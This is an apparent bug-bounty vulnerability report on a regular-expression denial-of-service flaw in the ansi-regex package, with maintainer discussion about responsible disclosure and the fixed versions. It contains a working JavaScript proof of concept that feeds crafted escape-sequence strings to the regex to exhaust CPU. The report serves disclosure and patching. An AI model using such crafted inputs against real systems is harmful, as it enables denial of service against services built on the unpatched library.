Inefficient Regular Expression Complexity in chalk/ansi-regex
Reported on
Sep 9th 2021
✍️ Description
It allows cause a denial of service when matching crafted invalid ANSI escape codes.
🕵️♂️ Proof of Concept
// PoC.mjs
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Occurrences
Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?
Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.
@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or open an issue until the report has been validated.
The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.
Thank you for your reply@Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!
The bounty setting may be related to the popularity of the project? I'm not sure, you@Sindre Sorhus can ask @admin?
Fixed in:
- 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
- 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
We also have:
4.1.1: https://github.com/chalk/ansi-regex/releases/tag/v4.1.1
This is a tag without a release. It includes the same fix as 5.0.1 and 6.0.1 (https://github.com/chalk/ansi-regex/pull/37)